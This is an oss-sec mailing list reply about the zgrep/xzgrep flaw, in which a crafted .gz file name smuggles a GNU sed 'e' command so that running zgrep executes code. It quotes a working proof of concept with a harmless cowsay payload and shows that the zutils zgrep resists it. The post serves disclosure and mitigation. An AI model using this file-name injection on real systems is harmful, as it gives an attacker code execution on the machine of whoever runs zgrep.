oss-sec mailing list archives
Re: zgrep, xzgrep: arbitrary-file-write vulnerability
From: Axel Beckert <abe () deuxchevaux org>
Date: Fri, 8 Apr 2022 11:18:12 +0200
Hi, On Fri, Apr 08, 2022 at 10:23:29AM +0200, Jakub Wilk wrote:
As mentioned in the xz patch, if you have GNU sed, you get not just file write, but direct code execution.
Ouch.
PoC: $ touch foo.gz $ echo foo | gzip > "$(printf '|\n;e cowsay pwned\n#.gz')" $ zgrep foo *.gz _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || foo
JFTR, if you have replaced GNU's zgrep with zgrep from zutils (https://www.nongnu.org/zutils/zutils.html; allows to use z* tools with many compression formats, also mixed in a single command), then this exploit does not work: abe@c6:~/tmp/zgrep-PoC $ touch foo.gz abe@c6:~/tmp/zgrep-PoC $ echo foo | gzip > "$(printf '|\n;e cowsay pwned\n#.gz')" abe@c6:~/tmp/zgrep-PoC $ zgrep foo *.gz | ;e cowsay pwned #.gz:foo abe@c6:~/tmp/zgrep-PoC $ zgrep.gzip foo *.gz _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || foo abe@c6:~/tmp/zgrep-PoC $ dpkg -S /bin/zgrep diversion by zutils from: /bin/zgrep diversion by zutils to: /bin/zgrep.gzip gzip, zutils: /bin/zgrep abe@c6:~/tmp/zgrep-PoC Kind regards, Axel -- PGP: 2FF9CD59612616B5 /~\ Plain Text Ribbon Campaign, http://arc.pasp.de/ Mail: abe () deuxchevaux org \ / Say No to HTML in E-Mail and Usenet Mail+Jabber: abe () noone org X https://axel.beckert.ch/ / \ I love long mails: https://email.is-not-s.ms/
Attachment:
signature.asc
Description:
Current thread:
- zgrep, xzgrep: arbitrary-file-write vulnerability Jim Meyering (Apr 07)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Jakub Wilk (Apr 08)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Axel Beckert (Apr 08)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Levente Polyak (Apr 08)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Jakub Wilk (Apr 08)